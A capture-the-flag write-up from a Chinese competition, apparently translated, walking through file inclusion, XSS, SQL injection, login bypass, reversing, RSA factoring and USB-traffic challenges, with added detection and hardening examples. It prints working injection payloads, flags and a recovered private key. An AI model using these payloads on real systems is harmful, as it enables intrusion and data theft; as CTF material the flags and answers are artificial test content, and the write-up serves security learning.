The 1st Wanggu Cup (网谷杯)

news/2025/2/24 8:23:10

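A tally of all the challenges from the four rounds (12 in total; the four rounds fielded 21 challenges altogether, including swapped-in replacements).
Just some casual notes in case old challenges get reused (they already have been).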

Web

File Inclusion 1

Pseudo-protocol (PHP stream wrapper)
http://120.202.175.143:8011/?c=php://filter/convert.base64-encode/resource=hhb.php

PD9waHANCmlmIChmbm1hdGNoKCIqaGhiLnBocCoiLCRzdmlkMSkpew0KJHN2aWQ9ICdTVklEW25nNTQycGg5OHd5cjk3ZnF2NGMzcXZnOW5qazU0MjRlZWRdJzsNCn1lbHNlew0KZWNobyAndHJ5o6EnOw0KfQ0KPz4NCg==

Base64-decoded:

<?php
if (fnmatch("*hhb.php*",$svid1)){
    $svid= 'SVID[ng542ph98wyr97fqv4c3qvg9njk5424eed]';
}else{
    echo 'try!';
}
?>

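File Inclusion 2

Funny: the target was a shared machine, and someone changed the flag.
Near the end the challenge was swapped out at lightning speed (replaced with the file inclusion challenge above).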

data:// pseudo-protocol
?c=data://text/plain,<?php highlight_file("index.php");?>

<?php
if (isset($_GET['c']))
    if (!fnmatch ("data*",$_GET['c'])){
        echo 'GET c<br>$svid';
    } else {
        $svid='SVID[nwe9felwh309whec5469089ewfq2cpqr]';
        include($_GET['c']);
    }
else{
    echo 'GET c<br>$svid';
    exit;
}
?>

xss

Unicode bypass [probably straight from xsslab]
Log in first:
example:123456
Then enter:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;

Click the link and that's it.
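Why the entity-encoded link gets through and a check that stops it, as an added example that is not part of the original writeup or the challenge's code. It assumes the challenge filtered on the literal keyword; naive_keyword_filter, browser_view and is_safe_href are hypothetical names.

```python
import html
from urllib.parse import urlsplit

# Payload from the writeup: every character is an HTML numeric character reference.
PAYLOAD = ("&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;"
           "&#97;&#108;&#101;&#114;&#116;&#40;&#41;")

# Assumed policy for this example: only absolute http(s) links are accepted.
ALLOWED_SCHEMES = {"http", "https"}


def naive_keyword_filter(value):
    """Assumed weak check: accept anything that lacks the literal keyword."""
    return "javascript" not in value.lower()


def browser_view(value):
    """Decode character references once, as an HTML parser does for attribute
    values, then drop tab/CR/LF, which URL parsers ignore."""
    decoded = html.unescape(value)
    return "".join(ch for ch in decoded if ch not in "\t\r\n").strip()


def is_safe_href(value):
    """Validate the scheme of the value the browser will actually navigate to."""
    scheme = urlsplit(browser_view(value)).scheme.lower()
    return scheme in ALLOWED_SCHEMES


if __name__ == "__main__":
    for candidate in (PAYLOAD, "&#x6A;avascript:alert()", "java\tscript:alert()",
                      "https://example.com/profile"):
        print(repr(browser_view(candidate)), naive_keyword_filter(candidate),
              is_safe_href(candidate))
```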

SQL Injection

Straight from sqlilab?
Use %0a to bypass the space filter

?id=0')uNIOn(sELEct(1),(2),(select(user())));%00
?id=0')union(select(1),2,(select%0agroup_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()));%00
?id=0')union(select(1),2,(select%0agroup_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name="users"));%00
?id=0%27)union(select(1),2,(select%0agroup_concat(password)%0afrom%0ausers));%00
http://120.202.175.143:8014/index/?id=0%27)uNIOn(sELEct(1),2,(select%0agroup_concat(title)%0afrom%0aarticle));%00
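A detection sketch for the file inclusion and SQL injection requests above, added here as an example and not part of the original writeup. The log lines are constructed from the writeup's requests (host omitted, spaces and quotes percent-encoded), and the rule names and functions are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Constructed request lines that mirror the requests in this writeup.
SAMPLE_LOG = [
    "GET /?c=php://filter/convert.base64-encode/resource=hhb.php HTTP/1.1",
    "GET /?c=data://text/plain,%3C?php%20highlight_file(%22index.php%22);?%3E HTTP/1.1",
    "GET /index/?id=0%27)uNIOn(sELEct(1),2,(select%0agroup_concat(title)%0afrom%0aarticle));%00 HTTP/1.1",
    "GET /index/?id=7 HTTP/1.1",
]

# Rules run on the decoded value, so %0a-for-space and mixed case do not hide anything.
RULES = [
    ("stream-wrapper", re.compile(r"^\s*(php|data|phar|zip|file|glob|expect):", re.I)),
    ("union-select", re.compile(r"\bunion\W*(all\W*)?select\b", re.I)),
    ("null-byte", re.compile(r"\x00")),
]


def params(request_line):
    """Yield (name, decoded value) pairs; split on '&' only so ';' stays in the value."""
    target = request_line.split(" ")[1]
    query = target.partition("?")[2]
    for field in query.split("&"):
        name, _, value = field.partition("=")
        if name:
            yield unquote_plus(name), unquote_plus(value)


def scan(request_line):
    """Return the sorted (parameter, rule) hits for one request line."""
    hits = set()
    for name, value in params(request_line):
        for rule, pattern in RULES:
            if pattern.search(value):
                hits.add((name, rule))
    return sorted(hits)


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(scan(line), line)
```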

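Universal Password 1

Unintended 1: log in directly with admin:admin
Unintended 2: curl http://ip:port/svid.php
Intended (in my own opinion):
Tried the usual universal username/password payloads such as admin' or 1=1-- ; none of them worked, and there was not even a hint.
Guessing that the password might be hashed, I thought of the universal string ffifdyop.
Opened Burp to brute-force it.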

http://120.202.175.143:8012/?uname=admin%27%20%23&passwd=ffifdyop
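Why ffifdyop is called a universal string, as an added example that is not from the original writeup or the challenge. It assumes the login pastes the raw 16-byte MD5 digest into the SQL text (the writeup only guesses that the password is hashed); the table, column and function names are hypothetical, and SQLite stands in for the challenge's database.

```python
import hashlib
import sqlite3


def raw_md5(passwd):
    """Raw 16-byte digest, the form assumed to be pasted into the query."""
    return hashlib.md5(passwd.encode()).digest()


def make_db():
    """In-memory stand-in for the challenge's user table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uname TEXT, pw_raw TEXT, pw_hex TEXT)")
    secret = "constructed-secret"
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("admin", raw_md5(secret).decode("latin-1"), raw_md5(secret).hex()))
    return db


def login_vulnerable(db, uname, passwd):
    """Assumed flaw: digest bytes are concatenated into the statement."""
    raw = raw_md5(passwd).decode("latin-1")
    sql = "SELECT uname FROM users WHERE uname='%s' AND pw_raw='%s'" % (uname, raw)
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # the digest bytes broke the statement


def login_hardened(db, uname, passwd):
    """Hex digest plus bound parameters: input never becomes SQL syntax.
    MD5 is kept only to mirror the assumed challenge; use a password KDF."""
    row = db.execute("SELECT uname FROM users WHERE uname=? AND pw_hex=?",
                     (uname, raw_md5(passwd).hex())).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print(raw_md5("ffifdyop"))  # the digest begins with the bytes 'or'6
    print(login_vulnerable(db, "admin", "ffifdyop"),
          login_hardened(db, "admin", "ffifdyop"))
```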

Universal Password 2

Unintended: curl http://ip:port/svid.php
Intended:

?uname=like' UNION ALL SELECT CONCAT(1,2),NULL-- -&passwd=like

Universal Password 3

Unintended: curl http://ip:port/svid.php
Intended: no idea

Reverse

re1

Even people who can't do reversing can solve this one.

The file's MD5 hash is: 9083aceef1a0c7ea36183fde040f721e
IDA decompilation:

unsigned __int64 __fastcall ba(__int64 a1, size_t *a2)
{
  size_t i; // [rsp+18h] [rbp-68h]
  char v4[20]; // [rsp+2Ch] [rbp-54h] BYREF
  char v5[56]; // [rsp+40h] [rbp-40h] BYREF
  unsigned __int64 v6; // [rsp+78h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  strcpy(&v4[6], "djqjnqdwfyl!");
  strcpy(v4, "flag{");
  pp(v5, v4, &v4[6]);
  pp(v5, v5, &unk_2004);
  *a2 = strlen(v5);
  for ( i = 0LL; i < *a2; ++i )
    *(_BYTE *)(a1 + i) = v5[i];
  return __readfsqword(0x28u) ^ v6;
}

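The value of unk_2004 is }
An AI analyzed this and worked out the flag:

- strcpy(&v4[6], "djqjnqdwfyl!");: copies "djqjnqdwfyl!" to the position starting at v4[6].
- strcpy(v4, "flag{");: copies "flag{" to v4[0].
- pp(v5, v4, &v4[6]);: assuming pp is some kind of concatenation function (possibly strcat), it concatenates v4 ("flag{") and &v4[6] ("djqjnqdwfyl!") and stores the result in v5, i.e. v5 = "flag{djqjnqdwfyl!".
- pp(v5, v5, &unk_2004);: concatenates v5 with an unknown string (unk_2004).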

re2

Decompile with IDA and read the source:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  v10 = __readfsqword(0x28u);
  qmemcpy(v8, "Q[VPL{QVAz]PC^Z]R_QCH]VR_]NZMVSZ]ORM_[HV[SN^AJ", 46);
  v7 = 55;
  puts("Welcome to the secret decoder!");
  puts("Can you figure out the key to unlock the secret message?");
  puts("The message is hidden inside the program...");
  for ( i = 0; i <= 999999; ++i )
    ;
  for ( j = 0; *((_BYTE *)v8 + j); ++j )
    ;
  putchar(10);
  printf("Enter the decryption key (in hexadecimal): ");
  fgets(s, 100, _bss_start);
  __isoc99_sscanf(s, "%x", &v4);
  if ( v7 == v4 )
  {
    xor_encrypt_decrypt(v8, v7);
    printf("Decrypted: %s\n", (const char *)v8);
  }
  else
  {
    puts("Incorrect key. Try again!");
  }
  return 0;
}

If the entered v4 equals v7, decryption succeeds.
The input must be in hexadecimal (%x).
55 in hexadecimal is 0x37, so enter 37.

$ ./bb
Welcome to the secret decoder!
Can you figure out the key to unlock the secret message?
The message is hidden inside the program...

Enter the decryption key (in hexadecimal): 37
Decrypted: flag{LfavMjgtimjehftjaehjymzadmjxezhlaldyiv}
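The key check protects nothing once the constant and the buffer are visible in the decompilation. This added example (not from the original writeup) recovers the key from the known flag{ prefix and decodes the buffer offline; it assumes xor_encrypt_decrypt, whose body is not shown on the page, is a plain single-byte XOR, and the function names are hypothetical.

```python
# Bytes copied from the qmemcpy() call in the decompiled main().
CIPHERTEXT = b"Q[VPL{QVAz]PC^Z]R_QCH]VR_]NZMVSZ]ORM_[HV[SN^AJ"
KNOWN_PREFIX = b"flag{"  # flag format used throughout the writeup


def recover_key(ciphertext, known_prefix):
    """Derive a single-byte XOR key from known plaintext; fail if inconsistent."""
    candidates = {c ^ p for c, p in zip(ciphertext, known_prefix)}
    if len(candidates) != 1:
        raise ValueError("not a single-byte XOR of the known prefix")
    return candidates.pop()


def xor_bytes(data, key):
    """Assumed behaviour of xor_encrypt_decrypt(): XOR every byte with the key."""
    return bytes(b ^ key for b in data)


def printable(data):
    """Keep only printable ASCII, which is what a terminal shows."""
    return "".join(chr(b) for b in data if 0x20 <= b < 0x7F)


def hidden_bytes(data):
    """Offsets and values of the bytes that a terminal would not display."""
    return [(i, b) for i, b in enumerate(data) if not 0x20 <= b < 0x7F]


if __name__ == "__main__":
    key = recover_key(CIPHERTEXT, KNOWN_PREFIX)
    plain = xor_bytes(CIPHERTEXT, key)
    print(hex(key), printable(plain), hidden_bytes(plain))
```

With the bytes as printed on the page, two positions decode to 0x7f, which the terminal output above does not show.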

Misc

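RSA Decryption

The archive contains a flag.zip, an RSA public key, and a ciphertext file.
The RSA public key is very short, so once n is obtained it can be factored.
Use RsaCtfTool: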

$  /opt/RsaCtfTool/RsaCtfTool.py --dumpkey --key rsa_public_key.pem
[!] Using native python functions for math, which is slow. install gmpy2 with: 'python3 -m pip install <module>'.
private argument is not set, the private key will not be displayed, even if recovered.
None
n: 99965623838843374711411183391444104726307314029768628656811347707805304989037
e: 65537

Factor n at https://factordb.com/ to obtain p and q.

Generate the private key:

/opt/RsaCtfTool/RsaCtfTool.py -n 99965623838843374711411183391444104726307314029768628656811347707805304989037 -e 65537 -p 301421686937198008750983790559102741399 -q  331647085034301039007512063728344459163
-----BEGIN RSA PRIVATE KEY-----
MIGqAgEAAiEA3QKJvADgw3sTapG0Bx0KOYVJ+Uy4hfdWtz+fOhShpW0CAwEAAQIg
MzYtWEUTz/gq7ZzJjIRsI62ksoMYL9oST48H90zxqzkCEQDiw7SM9+Zjncud9oGi
q6uXAhEA+YDnu2zTMNUuGGmIUXFnmwIQe7V6hUEkfgnysD1v4Xe4BwIRAJ1GC0zS
sWFjz7WluD8WTCcCEDGBq/10a8U+kL+OpPxp0tM=
-----END RSA PRIVATE KEY-----

Decrypt with the private key:

$ openssl rsautl -decrypt -in venus.en -inkey 1.pem
The command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead.
key is 123!@#456

The password is 123!@#456
Extracting the archive yields flag{78c46c7e7834474f972e3ed44413e27f}
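What the steps above amount to numerically, as an added example that is not from the original writeup: with the factors known, every private component follows from n, e, p and q. It uses the values printed above; the 2048-bit floor is an assumed policy, the round trip is textbook RSA without the padding that openssl applies, and the function names are hypothetical.

```python
from math import gcd

# Values printed in the writeup (RsaCtfTool --dumpkey output and the factors).
N = 99965623838843374711411183391444104726307314029768628656811347707805304989037
E = 65537
P = 301421686937198008750983790559102741399
Q = 331647085034301039007512063728344459163

MIN_MODULUS_BITS = 2048  # assumed policy floor for this example


def audit_modulus(n):
    """Return (bit length, acceptable?) for a public modulus."""
    bits = n.bit_length()
    return bits, bits >= MIN_MODULUS_BITS


def rebuild_private_key(n, e, p, q):
    """Recompute the private components once the factors of n are known."""
    if p * q != n:
        raise ValueError("p * q does not equal n")
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e is not invertible modulo phi(n)")
    d = pow(e, -1, phi)
    return {"d": d, "dp": d % (p - 1), "dq": d % (q - 1), "qinv": pow(q, -1, p)}


def decrypt_crt(c, key, p, q):
    """Textbook RSA decryption with the CRT components (no padding removal)."""
    m1 = pow(c, key["dp"], p)
    m2 = pow(c, key["dq"], q)
    h = (key["qinv"] * (m1 - m2)) % p
    return m2 + h * q


def round_trip(message):
    """Encrypt a constructed message with (N, E), decrypt with the rebuilt key."""
    key = rebuild_private_key(N, E, P, Q)
    c = pow(int.from_bytes(message, "big"), E, N)
    return decrypt_crt(c, key, P, Q).to_bytes(len(message), "big")


if __name__ == "__main__":
    print(audit_modulus(N), round_trip(b"constructed sample"))
```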

Traffic Data Analysis

Solved in one shot with a script:

import os
import re
# os.system(r"tshark -r 1.pcapng -T fields -e usbhid.data > usbdata.txt")
normalKeys = {"04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h", "0c": "i",
              "0d": "j", "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p", "14": "q", "15": "r",
              "16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y", "1d": "z", "1e": "1",
              "1f": "2", "20": "3", "21": "4", "22": "5", "23": "6", "24": "7", "25": "8", "26": "9", "27": "0",
              "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[",
              "30": "]", "31": "\\", "32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".", "38": "/",
              "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
              "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
shiftKeys = {"04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H", "0c": "I",
             "0d": "J", "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q", "15": "R",
             "16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y", "1d": "Z", "1e": "!",
             "1f": "@", "20": "#", "21": "$", "22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")",
             "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{",
             "30": "}", "31": "|", "32": "<NON>", "33": "\"", "34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?",
             "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
             "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
output = []
path = r'usbdata.txt'
with open(path, 'r') as fh:
    contents = fh.read().split()
    # print(contents)
    for cont in contents:
        if len(cont) == 16:
            # Split into byte pairs: '0000100000000000' => ['00', '00', '10', '00', '00', '00', '00', '00']
            a = re.findall('.{2}', cont)
            # print(":".join(a))
            cont = ":".join(a)  # 00:00:10:00:00:00:00:00
            try:
                # Skip reports that do not qualify
                if (cont[0] != '0' or (cont[1] != '0' and cont[1] != '2')
                        or cont[3] != '0' or cont[4] != '0'
                        or cont[9] != '0' or cont[10] != '0'
                        or cont[12] != '0' or cont[13] != '0'
                        or cont[15] != '0' or cont[16] != '0'
                        or cont[18] != '0' or cont[19] != '0'
                        or cont[21] != '0' or cont[22] != '0'
                        or cont[6:8] == "00"):
                    continue
                if cont[6:8] in normalKeys.keys():
                    # Shift not pressed
                    if cont[1] != '2':
                        output += normalKeys[cont[6:8]]
                        # print(cont, output)
                    # Shift pressed
                    else:
                        output += shiftKeys[cont[6:8]]
                else:
                    output += "äă"  # arbitrary placeholder
            except Exception:
                pass
print("结果:", output)
flag = ""

for i in range(0, len(output)):
    flag += output[i][0]
print(flag)
flag = re.sub("<CAP>(.*?)<CAP>", lambda matchStr: matchStr.group(1).upper(), flag)
# Repeatedly remove a character followed by <DEL>, e.g. aaaa<DEL><DEL> => aa
while re.findall(r".<DEL>", flag, re.DOTALL):
    # flags must be passed by keyword: the fourth positional argument of re.sub is count
    flag = re.sub(r".<DEL>", "", flag, flags=re.DOTALL)
print(flag)

The flag has to be in uppercase, unbelievable.
flag{A72BD409-B511-472B-A5A0-2F348BC5B9F3}

Alternatively, use ctf-neta to solve it in one shot.

Crypto

Cipher challenge (0 solves)

Here is a CTF challenge: Xiao Ming sent an encrypted message to the Wanggu Cup organizers and also provided the encryption code; unfortunately, the encryption code was encrypted too (300 points). Ciphertext: ==DMeOzM6y2p0ZQB3LzpaMUAxOwZ0kTs Encryption code: rgvsm06wIkr06uRuoKYFhipDMTZVpi11dxaycA1vo+FHOPxCbxHdkKDGT5M4dzsONhCYZPfBn7R3dCfpzIxwc5Y8Wp7exB44F69ys0vmqsZ4j+AM2zdWhmg+CctVlXWKFF4phnpgb0UhaV0l1JIAq5+AZ9bwZD6KWXkO9aVTeIbRGemcg1KfSCqCzd1Cjg790YjjWUTb84bM9RQdtlVS932Cg2jfHYwWCQJyB0MOCghQLwYcJryRb+JzJ568c5jwwqTymV4ZJbA1KUIl7KfE3+XjZON4q+nv20tuaXI0FW4Az266/u4a7ORXoKvljJbJFImER/mi0Yb8EuhF3CWLy07kAsYFYT7HHUNT1hGMnmTAVNHmmqXPZoOhnMcdmepJ4NEnXIDE1c0Vif+eZzRKuAxqXOB0Lf9CMQ==
